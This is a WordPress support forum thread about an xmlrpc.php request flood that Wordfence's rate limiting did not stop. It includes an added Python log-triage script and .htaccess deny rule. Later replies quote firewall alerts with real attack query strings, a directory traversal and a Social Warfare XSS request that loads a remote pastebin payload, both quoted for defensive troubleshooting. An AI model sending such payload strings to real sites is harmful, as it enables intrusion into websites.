• We had an attack on a client’s website which is using Wordfence. The attacker was querying xmlrpc.php multiple times. We’ve registered around 80k requests over a 10-hour period. So this could possibly be a DoS attack or a brute force attack.

    In Wordfence we have Brute Force Protection enabled with the default settings (lock out after 5 attempts and so on).

    Regarding the possible DoS attack. All the calls came from the same 2 IP addresses based in Russia. In Wordfence the rate limit option is enabled and set to throttle if anyone exceeds 30 requests per minute.

    The attacker long exceeded the limits set in Wordfence. Still, they were spawning hundreds of Apache processes, draining resources from the server and taking the website down for hours. The only solution that worked was to block access to xmlrpc.php completely (via .htaccess). But this has the downside of disabling WordPress’ XML-RPC service.

    Has anyone experienced that? Does anyone from the Wordfence team have some insight about it?
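The access-log triage described in the post above, as an added example that is not from the thread or from Wordfence: it parses Apache combined-format log lines, counts xmlrpc.php requests per client IP and per minute, flags IPs whose peak rate exceeds a limit (30/min, the Wordfence setting quoted in the thread), and renders the kind of `.htaccess` fragment the poster applied. The log lines are constructed (RFC 5737 documentation addresses), and the fragment assumes Apache 2.4 `Require` syntax with `.htaccess` overrides enabled; none of this is taken from the poster’s actual server.

```python
"""Triage Apache access-log lines for xmlrpc.php flooding.

Added example, not code from the thread or from Wordfence. Sample log lines
are constructed; the .htaccess output assumes Apache 2.4 'Require' syntax.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime

# Apache "combined" LogFormat:
# %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # %t renders as 10/Sep/2019:14:05:01 +0000
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def xmlrpc_stats(lines):
    """Return (total xmlrpc.php hits per IP, peak hits in any single minute per IP)."""
    totals = Counter()
    per_minute = defaultdict(Counter)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        # Compare the path without its query string, so /xmlrpc.php?rsd still counts.
        if rec["path"].split("?", 1)[0] != "/xmlrpc.php":
            continue
        totals[rec["ip"]] += 1
        per_minute[rec["ip"]][rec["ts"].replace(second=0)] += 1
    peaks = {ip: max(buckets.values()) for ip, buckets in per_minute.items()}
    return totals, peaks


def ips_over_rate(lines, per_minute_limit=30):
    """IPs whose peak xmlrpc.php rate exceeds the limit (30/min is the Wordfence
    rate-limit setting the thread mentions). Sorted for stable output."""
    _, peaks = xmlrpc_stats(lines)
    return sorted(ip for ip, peak in peaks.items() if peak > per_minute_limit)


def htaccess_deny_xmlrpc(allow_ips=()):
    """Apache 2.4 .htaccess fragment denying xmlrpc.php to everyone except allow_ips.

    With no allow list this is the blanket block the poster applied. Inside a
    <Files> section Apache 2.4 treats multiple Require directives as RequireAny,
    so listing only 'Require ip ...' denies every other client.
    """
    rule = "Require ip " + " ".join(allow_ips) if allow_ips else "Require all denied"
    return '<Files "xmlrpc.php">\n    {}\n</Files>\n'.format(rule)


def _constructed_sample():
    """Constructed log lines: one flooding IP (40 hits in a minute), one busy but
    under-threshold IP (20 hits), one ordinary visitor. Not real traffic."""
    fmt = ('{ip} - - [10/Sep/2019:14:{mm:02d}:{ss:02d} +0000] '
           '"POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"')
    lines = [fmt.format(ip="203.0.113.7", mm=5, ss=s) for s in range(40)]
    lines += [fmt.format(ip="198.51.100.9", mm=5, ss=s) for s in range(0, 60, 3)]
    lines += [
        '192.0.2.44 - - [10/Sep/2019:14:06:02 +0000] "GET /wp-login.php HTTP/1.1" 200 2500 "-" "Mozilla/5.0"',
        '192.0.2.44 - - [10/Sep/2019:14:06:03 +0000] "POST /xmlrpc.php?rsd HTTP/1.1" 403 199 "-" "Mozilla/5.0"',
        'not a log line',
    ]
    return lines


SAMPLE_LOG = _constructed_sample()

if __name__ == "__main__":
    totals, peaks = xmlrpc_stats(SAMPLE_LOG)
    for ip, n in totals.most_common():
        print("{:<16} total={:<5} peak/min={}".format(ip, n, peaks[ip]))
    print("over 30/min:", ips_over_rate(SAMPLE_LOG))
    print(htaccess_deny_xmlrpc())
```

Run against a real `access.log` with `xmlrpc_stats(open("access.log"))`. The per-minute peak is the number to compare with a plugin rate limit: an IP far above it that is still appearing in the log is exactly the case the thread describes, where the plugin is already answering 403 but every request still occupies an Apache worker, so the block has to move to the web server (the `<Files>` fragment) or in front of it.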

Viewing 13 replies - 1 through 13 (of 13 total)
  • Hi @lsantana,

    Are you able to see the same 2 IP addresses attacking your website from Wordfence -> Tools -> Live Traffic?

    Dave

    Thread Starter Luciano Santana

    (@lsantana)

    Hi Dave !

    Thank you for the reply. No, it’s not there. We’ve identified the IPs by looking into the Apache access logs.

    Thread Starter Luciano Santana

    (@lsantana)

    By the way. The attack is still ongoing although the attacker is getting a 403 as response.

    Plugin Support wfscott

    (@wfscott)

    @lsantana

    Sorry for the delay.

    Can you give me an idea of what your lockout times are set to in the Brute Force and Rate Limiting areas? Hopefully we can prevent this from escalating in the future.

    It sounds like a DDoS mitigation would’ve been needed to fully combat this issue.

    Scott

    Thread Starter Luciano Santana

    (@lsantana)

    Hi Scott,

    Thanks for replying. Here are the settings for Brute Force and for Rate Limiting.

    Plugin Support wfscott

    (@wfscott)

    The brute force settings look good, however I would recommend upping the amount of time the attempts are counted over, maybe 30 minutes or an hour rather than 10 minutes.

    Your rate limiting settings look good overall. Have you experienced similar issues since the last instance you messaged us about?

    Scott

    Thread Starter Luciano Santana

    (@lsantana)

    Hi Scott !

    As I’ve mentioned on the first message:

    The only solution that worked was to block access to xmlrpc.php completely (via .htaccess).

    The attack kept going on for days and the attacker was just receiving a 403 after the solution was applied.

    I wouldn’t roll back that change until I have confirmation this issue is solved via Wordfence. For this specific website, since it’s in production, stability is very important and we don’t really use any of WordPress’ XML-RPC service at the moment.

    Finally, regarding your comment:

    I would recommend upping the amount of time the attempts are counted over, maybe 30 minutes or an hour rather than 10 minutes.

    I’m not sure that would help. The attempts were occurring multiple times in a single minute. So a 10-minute window should be more than enough to flag those IPs as attackers.

    I am also facing the same issue, tracked by Wordfence Security:
    Singapore attempted a failed login using an invalid username “Fahim”. https://www.domainname.com/xmlrpc.php
    9/4/2019 7:07:49 PM (1 day 18 hours ago)
    IP: xxx.xx.xxx.xxx Hostname: sg2plcpnl0061.prod.sin2.secureserver.net
    Human/Bot: Bot
    Browser: undefined
    Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1

    Also, the following URLs are being hit from different IPs.

    Where are the actual hits on the following URLs coming from?

    1)https://www.mydomain.com/wp-admin/admin-ajax.php?swp_debug=load_options&swp_url=https%3A%2F%2Fpastebin.com%…

    2) https://www.mydomain.com/xmlrpc.php

    3) https://www.mydomain.com/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=..%2Fdata%2Fadmin%2Fconfig_update.php

    4) https://www.mydomain.com/wp-login.php

    What is the reason for this?

    Thanks

    Please provide us a solution…

    Thread Starter Luciano Santana

    (@lsantana)

    @zotezo from the log you’ve shared it seems Wordfence is catching and preventing the attack, while the issue reported in this post is something that falls under Wordfence’s radar. I would recommend you either search the forum for a post that describes your exact issue or open a new post with a better description of the issue you are experiencing.

    Hi,
    I have added Wordfence Security and it is showing this alert-
    Shanghai, China was blocked by firewall for Directory Traversal in query string: install_demo_name=..%2Fdata%2Fadmin%2Fconfig_update.php at https://www.mydomain.com/install/index.php.bak?step=11&insLockfile=a&s_lang=x&install_demo_name=..%2Fdata%2…
    9/6/2019 8:51:51 AM (6 hours 4 mins ago)
    IP: 222.186.174.90 Hostname: 222.186.174.90
    Human/Bot: Human
    Browser: Safari version 0.0 running on MacOSX
    Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50

    Activity Detail
    Oradea, Romania was blocked by the Wordfence Security Network at https://www.mydomain.com/wp-login.php
    9/6/2019 12:07:54 AM (14 hours 51 mins ago)
    IP: 89.35.39.60 Hostname: 89.35.39.60
    Human/Bot: Human
    Browser: Chrome version 56.0 running on Win7
    Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331

    Wayne, United States was blocked by firewall for Social Warfare <= 3.5.2 – Unauthenticated Stored Cross-Site Scripting in query string: swp_url=https%3A%2F%2Fpastebin.com%2Fraw%2FssNe5tqw at https://www.mydomain.com/wp-admin/admin-ajax.php?swp_debug=load_options&swp_url=https%3A%2F%2Fpastebin.com%…
    9/5/2019 2:47:26 AM (1 day 12 hours ago)
    IP: 74.208.27.141 Hostname: 74.208.27.141
    Human/Bot: Human
    Browser: Firefox version 0.0 running on Win7
    Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0

    Is this any type of Brute Force attack?

    Thanks,
    zotezo

    Thread Starter Luciano Santana

    (@lsantana)

    @zotezo as I said, by reading your logs I can see Wordfence is working as expected. Please don’t hijack this post with an unrelated issue. If you need some specific support, open a thread of your own.

    Short answer is: yes, you are being attacked, but Wordfence is doing its job in your case.

    Thanks for your clarification.

  • The topic ‘Brute Force Protection / Rate limit failed’ is closed to new replies.